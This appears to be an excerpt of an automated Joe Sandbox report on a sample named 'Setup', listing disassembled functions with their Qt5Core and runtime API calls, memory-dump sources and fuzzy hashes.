                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??8@String@@0@$DateTime@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 7445742-0
                                                                                                                                                              • Opcode ID: f173f43a48de264e32183795082b866f6c6035ab2a9b0a3fcfccda9672384c71
                                                                                                                                                              • Instruction ID: 5076f151132b6aedd53f7f99487f8243c3c20902a7328be351dd7a2dd6b562ab
                                                                                                                                                              • Opcode Fuzzy Hash: f173f43a48de264e32183795082b866f6c6035ab2a9b0a3fcfccda9672384c71
                                                                                                                                                              • Instruction Fuzzy Hash: 903199E2A0A59256EFC38B65E184138A761EF04F8874C9031CEAC1B14ADF19D8E7CB12
                                                                                                                                                              Function 00007FFBA1A435D0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Mutex@@$?dispose@?lock@CriticalData@1@@Data@@EnterInit_thread_footerListLocker@@MutexRecursiveSection
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2842785555-0
                                                                                                                                                              • Opcode ID: 1f88512245a97524200e81daf7d2fa84940e51dcec8ca16cc7205a568e7d8045
                                                                                                                                                              • Instruction ID: a735f010c3a82a697d9d60f0b4f4e5c5cb349896d288a9b9400b384633bcfc7f
                                                                                                                                                              • Opcode Fuzzy Hash: 1f88512245a97524200e81daf7d2fa84940e51dcec8ca16cc7205a568e7d8045
                                                                                                                                                              • Instruction Fuzzy Hash: D3412EB191FA8285EBA29B34E45127A6360EF51770F944137DD6E562A1EF2CE844CF00
                                                                                                                                                              Function 00007FFBA1A3E440 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?createData@QMapDataBase@@SAPEAU1@XZ.QT5CORE(?,?,?,?,?,00007FFBA1A3EF0D), ref: 00007FFBA1A3E472
                                                                                                                                                              • ?recalcMostLeftNode@QMapDataBase@@QEAAXXZ.QT5CORE(?,?,?,?,?,00007FFBA1A3EF0D), ref: 00007FFBA1A3E4CC
                                                                                                                                                                • Part of subcall function 00007FFBA1A3DA50: ?createNode@QMapDataBase@@QEAAPEAUQMapNodeBase@@HHPEAU2@_N@Z.QT5CORE ref: 00007FFBA1A3DA78
                                                                                                                                                                • Part of subcall function 00007FFBA1A3DA50: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1A3DA91
                                                                                                                                                                • Part of subcall function 00007FFBA1A3DA50: ?color@QMapNodeBase@@QEBA?AW4Color@1@XZ.QT5CORE ref: 00007FFBA1A3DA9A
                                                                                                                                                                • Part of subcall function 00007FFBA1A3DA50: ?setColor@QMapNodeBase@@QEAAXW4Color@1@@Z.QT5CORE ref: 00007FFBA1A3DAA5
                                                                                                                                                                • Part of subcall function 00007FFBA1A3DA50: ?setParent@QMapNodeBase@@QEAAXPEAU1@@Z.QT5CORE ref: 00007FFBA1A3DAC6
                                                                                                                                                                • Part of subcall function 00007FFBA1A3DA50: ?setParent@QMapNodeBase@@QEAAXPEAU1@@Z.QT5CORE ref: 00007FFBA1A3DAF1
                                                                                                                                                              • ?setParent@QMapNodeBase@@QEAAXPEAU1@@Z.QT5CORE(?,?,?,?,?,00007FFBA1A3EF0D), ref: 00007FFBA1A3E49A
                                                                                                                                                              • ?createNode@QMapDataBase@@QEAAPEAUQMapNodeBase@@HHPEAU2@_N@Z.QT5CORE(?,?,?,?,?,00007FFBA1A3EF0D), ref: 00007FFBA1A3E51C
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,00007FFBA1A3EF0D), ref: 00007FFBA1A3E531
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$Node$?setData$?createNode@Parent@U1@@$Array@@ByteU2@_V0@@$?color@?recalcColor@Color@1@Color@1@@Data@LeftMost
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1714010273-0
                                                                                                                                                              • Opcode ID: 9391b1b43476b4c04b66880d53b66047a423e08cd1e3a77b7e9aaf74f70e4edb
                                                                                                                                                              • Instruction ID: df9eae535ea6fb2003920884f35e155364d7d57bc1afade916c0c72cfad6be71
                                                                                                                                                              • Opcode Fuzzy Hash: 9391b1b43476b4c04b66880d53b66047a423e08cd1e3a77b7e9aaf74f70e4edb
                                                                                                                                                              • Instruction Fuzzy Hash: F0316B7AA0AB0586DB55CF26E44422DB3A0FB88F90B048536DF6D437A5EF3DE815CB00
                                                                                                                                                              Function 00007FFBA19B51E0 Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1973CA9), ref: 00007FFBA19B521F
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1973CA9), ref: 00007FFBA19B522B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FFBA1973CA9), ref: 00007FFBA19B523D
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FFBA1973CA9), ref: 00007FFBA19B524A
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FFBA1973CA9), ref: 00007FFBA19B5257
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B625
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B630
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B642
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B64E
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B65A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?size@Data@@ListString@@$?begin@?data@Char@@$?end@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1839457078-0
                                                                                                                                                              • Opcode ID: b3a94d31746325542fb43f3870e4b07d46b3f8730d1759387a948fed7d80bb49
                                                                                                                                                              • Instruction ID: d8f55fbd2890d9e44316409a0f4a4c1109fa556da4e45c3b3db8f35938b08010
                                                                                                                                                              • Opcode Fuzzy Hash: b3a94d31746325542fb43f3870e4b07d46b3f8730d1759387a948fed7d80bb49
                                                                                                                                                              • Instruction Fuzzy Hash: 8E314FA2A0EA4691EF91DF21E4441A867A5FB44B98F848432EE4D07795EF3CE586CB00
                                                                                                                                                              Function 00007FFBA19F6660 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA19F5794,?,?,00000000,00007FFBA19D50EE), ref: 00007FFBA19F66A5
                                                                                                                                                              • ??0QUrl@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA19F5794,?,?,00000000,00007FFBA19D50EE), ref: 00007FFBA19F66B3
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA19F5794,?,?,00000000,00007FFBA19D50EE), ref: 00007FFBA19F66DC
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA19F5794,?,?,00000000,00007FFBA19D50EE), ref: 00007FFBA19F66E6
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA19F5794,?,?,00000000,00007FFBA19D50EE), ref: 00007FFBA19F671E
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BasicTimer@@Url@@$Mutex@@V0@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1508731206-0
                                                                                                                                                              • Opcode ID: 629e591a7b6f4cbfbbb2f848d6d6b4021524871de978bab2aa72f4cbed4ed1d6
                                                                                                                                                              • Instruction ID: 4025d431fb2c7ce7c14e98e1c717ee04d359113104ebd4c661959ef84b1766b8
                                                                                                                                                              • Opcode Fuzzy Hash: 629e591a7b6f4cbfbbb2f848d6d6b4021524871de978bab2aa72f4cbed4ed1d6
                                                                                                                                                              • Instruction Fuzzy Hash: 4E3169B2A0AB4296EB858F29E54026C73A0FB44B98F444039CF1D43794EF3DE556CB40
                                                                                                                                                              Function 00007FFBA1A26AC0 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(00000000,?,00000000,00007FFBA1A25790), ref: 00007FFBA1A26B1F
                                                                                                                                                              • ??0QByteArray@@QEAA@$$QEAV0@@Z.QT5CORE(?,00000000,00007FFBA1A25790), ref: 00007FFBA1A26B37
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA1A25790), ref: 00007FFBA1A26B46
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA1A25790), ref: 00007FFBA1A26B55
                                                                                                                                                                • Part of subcall function 00007FFBA1A25380: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(?,?,00000000,00007FFBA1A256F9), ref: 00007FFBA1A253B6
                                                                                                                                                                • Part of subcall function 00007FFBA1A56300: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA32,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A56310
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1A26BCE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$ArrayDataPtr@@@$A@$$CriticalEnterInit_thread_footerSectionV0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3140829187-0
                                                                                                                                                              • Opcode ID: 6aa0a5a8e5beeede0510b0895ef3258d8262d37e9a1767ac506dc25e90ed30ab
                                                                                                                                                              • Instruction ID: 180adc0ed94061d063bdc1c4b7d0aa1d95eee1de39fe371dc930627929514387
                                                                                                                                                              • Opcode Fuzzy Hash: 6aa0a5a8e5beeede0510b0895ef3258d8262d37e9a1767ac506dc25e90ed30ab
                                                                                                                                                              • Instruction Fuzzy Hash: 57312EA1E0EA8285FB928B35E8412B56361AF95760F504133DD6D472A0FF7DEC48CF00
                                                                                                                                                              Function 00007FFBA1994340 Relevance: 7.6, APIs: 5, Instructions: 56timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA1994380
                                                                                                                                                              • ??0QUrl@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA199438E
                                                                                                                                                              • ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA199439C
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA19943D1
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA19943DB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateTime@@Url@@V0@@$BasicTimer@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2465205131-0
                                                                                                                                                              • Opcode ID: 98d801be1bc780891d9f50137df4f0769f6e9bd066fe8520bed12de477e05161
                                                                                                                                                              • Instruction ID: 860e61813ba95a6249041caf742960f743001f36a46bb1328decdbab47a7cee5
                                                                                                                                                              • Opcode Fuzzy Hash: 98d801be1bc780891d9f50137df4f0769f6e9bd066fe8520bed12de477e05161
                                                                                                                                                              • Instruction Fuzzy Hash: 6921957270AA4282DB568F39E59017D3360EB44F98B444032DF6E47794DF3CD596CB40
                                                                                                                                                              Function 00007FFBA19BD370 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,00000000,00007FFBA1A27FD8,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA19BD3BB
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27FD8,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA19BD3C4
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27FD8,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA19BD3D0
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27FD8,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA19BD3DC
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA1A27FD8,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA19BD3F7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Array@@ByteData@1@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3506969666-0
                                                                                                                                                              • Opcode ID: fc1ad7dc6037159ee24f5b54a11e1de706518f5870edd119b1594011e350a0af
                                                                                                                                                              • Instruction ID: 6850b55f450f3bf4f4f9c108a8c1fbaadc4a47c01e84e2bf6bf2138dcb18d91d
                                                                                                                                                              • Opcode Fuzzy Hash: fc1ad7dc6037159ee24f5b54a11e1de706518f5870edd119b1594011e350a0af
                                                                                                                                                              • Instruction Fuzzy Hash: 0D11B272B0EB4686DF809F26F94006973A1EB88FD8B188031DE5E47B54DE3CD491CB40
                                                                                                                                                              Function 00007FFBA1991540 Relevance: 7.5, APIs: 5, Instructions: 49timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateTime@@$BasicCriticalEnterInit_thread_footerMutex@@SectionTimer@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1489054416-0
                                                                                                                                                              • Opcode ID: 98defec419155d722a1cb8295b46ff1945c7348fa996470aec9fe03c5ca60ca9
                                                                                                                                                              • Instruction ID: 763bedf1ccdb9ddcd793f983ca094daf7fe800723c2593209ca8e77568e01527
                                                                                                                                                              • Opcode Fuzzy Hash: 98defec419155d722a1cb8295b46ff1945c7348fa996470aec9fe03c5ca60ca9
                                                                                                                                                              • Instruction Fuzzy Hash: 2721C7E1A1EA8795EB829B35E8911792360FF447A8F448137DD3E422A1FF3CA845CF04
                                                                                                                                                              Function 00007FFBA19E1190 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA19E2618), ref: 00007FFBA19E11D6
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA19E2618), ref: 00007FFBA19E11DF
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA19E2618), ref: 00007FFBA19E11EB
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA19E2618), ref: 00007FFBA19E11F7
                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBA19E2618), ref: 00007FFBA19E121C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@memmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 437555178-0
                                                                                                                                                              • Opcode ID: 6562f20976d90ea347b7c2d6a57ed9b357aefa6f24c89571d5d7a50056255920
                                                                                                                                                              • Instruction ID: ef5a6ba996a5932486a4af948aeddfda9893e58f49f9fb4ccf86cc26a7101eb6
                                                                                                                                                              • Opcode Fuzzy Hash: 6562f20976d90ea347b7c2d6a57ed9b357aefa6f24c89571d5d7a50056255920
                                                                                                                                                              • Instruction Fuzzy Hash: C7115161B1A74542DB85CB6AF9441686261AB88FD4F484031DE1D83794DF3CD486CB00
                                                                                                                                                              Function 00007FFBA19940A0 Relevance: 7.5, APIs: 5, Instructions: 46timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE ref: 00007FFBA19940D6
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE ref: 00007FFBA19940E0
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA19940EA
                                                                                                                                                                • Part of subcall function 00007FFBA1994340: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA1994380
                                                                                                                                                                • Part of subcall function 00007FFBA1994340: ??0QUrl@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA199438E
                                                                                                                                                                • Part of subcall function 00007FFBA1994340: ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA199439C
                                                                                                                                                                • Part of subcall function 00007FFBA1994340: ??1QDateTime@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA19943D1
                                                                                                                                                                • Part of subcall function 00007FFBA1994340: ??1QUrl@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA199410A), ref: 00007FFBA19943DB
                                                                                                                                                              • ?setHost@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE ref: 00007FFBA1994116
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA199412B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
